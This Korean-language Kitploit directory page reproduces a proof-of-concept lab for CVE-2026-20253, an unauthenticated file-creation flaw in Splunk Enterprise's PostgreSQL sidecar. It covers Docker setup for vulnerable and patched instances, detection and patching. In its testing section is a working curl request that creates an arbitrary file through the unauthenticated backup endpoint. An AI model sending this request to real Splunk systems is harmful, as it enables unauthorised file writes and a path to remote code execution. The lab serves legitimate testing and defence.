Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-20253 — CVE-2026-20253용 POC | Kitploit
도구/GitHubGitHub/pssec-io/cve-2026-20253
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubpssec-io/cve-2026-20253

CVE-2026-20253

CVE-2026-20253용 POC

저장소 보기
1개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-20253 — Splunk Enterprise 사전 인증 RCE 실습 환경

PostgreSQL 사이드카를 통한 인증 없는 임의 파일 생성 및 잘라내기
CVSS 9.8 · 치명적(Critical) · CWE-306 · 활발히 악용 중 (CISA KEV)


⚠️ 면책 조항

이 저장소는 교육 및 승인된 보안 연구 목적으로만 엄격히 제공됩니다.
모든 테스트는 본인이 소유했거나 명시적 서면 허가를 받은 인프라에 대해서만 수행해야 합니다.
저자는 여기에 시연된 기법이나 도구의 오용에 대해 어떠한 책임도 지지 않습니다.
소유하지 않은 운영(프로덕션) 시스템이나 환경에서 절대 실행하지 마십시오.


개요

CVE-2026-20253은 10.2.4 및 10.0.7 미만의 Splunk Enterprise 버전에 영향을 줍니다.
Splunk에 번들로 포함된 PostgreSQL 사이드카 서비스는 두 개의 내부 HTTP 엔드포인트를 노출합니다:

root@kitploit:~
/v1/postgres/recovery/backup
/v1/postgres/recovery/restore

두 엔드포인트 모두 인증 검사가 전혀 없어(CWE-306) 네트워크로 접근 가능한 모든 공격자가 자격 증명 없이 호출할 수 있습니다. 공격자가 통제하는 backupFile 매개변수를 제공하면, 인증되지 않은 사용자가 Splunk 호스트 파일시스템에 임의의 파일을 생성하거나 잘라낼 수 있습니다 — 연구자들은 이 프리미티브를 체인으로 연결하여 완전한 사전 인증 원격 코드 실행(RCE)을 달성했습니다.

속성세부 정보
CVECVE-2026-20253
CVSS 점수9.8 (치명적)
CWECWE-306 — 중요 기능에 대한 인증 누락
영향받는 버전Splunk Enterprise 10.0.x < 10.0.7, 10.2.x < 10.2.4
패치 버전10.0.7, 10.2.4
CISA KEV2026년 6월 18일 추가됨

저장소 구조

root@kitploit:~
.
├── Dockerfile                  # Vulnerable image  (splunk 10.2.3)
├── docker-compose.yml          # Vulnerable container on port 8000
├── patched.Dockerfile          # Patched image     (splunk 10.2.4)
├── patched-docker-compose.yml  # Patched container on port 8001
└── instructions                # Quick command reference

사전 요구 사항

  • Docker + Docker Compose v2
  • 여유 디스크 공간 약 6GB (Splunk 이미지가 큼)
  • curl을 사용할 수 있는 Kali Linux 또는 모든 Linux 호스트

사용 방법

취약한 인스턴스 시작 (포트 8000)

root@kitploit:~
docker compose -f docker-compose.yml up -d --build

Splunk가 완전히 초기화될 때까지 약 90초를 기다립니다. 진행 상황은 다음 명령으로 확인하세요:

root@kitploit:~
docker compose -f docker-compose.yml logs -f
# Ready when you see: "Ansible playbook complete"

Splunk 웹 UI → http://localhost:8000
자격 증명: admin / changeme


패치된 인스턴스 시작 (포트 8001)

root@kitploit:~
docker compose -f patched-docker-compose.yml up -d --build

Splunk 웹 UI → http://localhost:8001
자격 증명: admin / changeme

두 컨테이너는 나란히 실행할 수 있습니다 — 충돌을 피하기 위해 포트가 서로 다르게 지정되어 있습니다.


테스트

취약한 인스턴스 테스트 → HTTP 400 예상

root@kitploit:~
curl -sk -X POST   "http://localhost:8000/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"

예상: 400 — 엔드포인트가 존재하며, 인증이 적용되지 않았고, 요청이 처리되었습니다.

컨테이너 내부에 파일이 생성되었는지 확인합니다:

root@kitploit:~
docker exec splunk-cve-2026-20253 ls -la /tmp/poc

패치된 인스턴스 테스트 → HTTP 401 예상

root@kitploit:~
curl -sk -X POST   "http://localhost:8001/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"

예상: 401 — 이제 인증이 적용되며, 요청이 거부됩니다.


응답 코드 참조

HTTP 상태의미
400

선택 사항: watchTowr 스캐너

watchTowr Labs 팀은 위 확인 작업을 자동화하는 탐지 스크립트를 공개했습니다:

root@kitploit:~
git clone https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
cd watchTowr-vs-Splunk-CVE-2026-20253
pip3 install requests
python3 watchTowr-vs-Splunk-CVE-2026-20253.py --host 127.0.0.1 --port 8000

실습 환경 종료

root@kitploit:~
# Stop vulnerable
docker compose -f docker-compose.yml down

# Stop patched
docker compose -f patched-docker-compose.yml down

수정 조치

즉시 패치된 버전으로 업데이트하십시오:

브랜치패치 버전
10.2.x10.2.4
10.0.x10.0.7

즉시 패치할 수 없다면, server.conf에 다음을 추가하고 Splunk를 재시작하여 PostgreSQL 사이드카를 비활성화하십시오:

root@kitploit:~
[postgres]
disabled = true

⚠️ Edge Processor 또는 SPL2 데이터 파이프라인을 실행 중이라면 사이드카를 비활성화하지 마십시오 — 해당 기능에 필요합니다.


참고 자료

  • 🔴 Splunk 공식 보안 권고 — SVD-2026-0603
  • 🔬 watchTowr Labs 연구 및 탐지 도구 — github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
  • 📋 CISA KEV 항목 — cisa.gov/known-exploited-vulnerabilities-catalog
  • 📰 The Hacker News 기사 — 공격자가 인증 없이 코드를 실행할 수 있게 하는 치명적인 Splunk Enterprise 결함

법적 고지

이 실습 환경은 방어적 보안 연구 및 교육 목적으로만 제공됩니다.
컴퓨터 시스템에 대한 무단 접근은 미국 컴퓨터 사기 및 남용 방지법(CFAA), 영국 컴퓨터 남용법(Computer Misuse Act) 및 전 세계의 동등한 법률에 따라 불법입니다.
책임감 있게 사용하십시오.

도구 다운로드
취약함 — 엔드포인트 도달, 인증 검사 없음
401패치됨 — 인증이 적용됨
404사이드카 없음 / 잘못된 경로
000컨테이너가 아직 준비되지 않음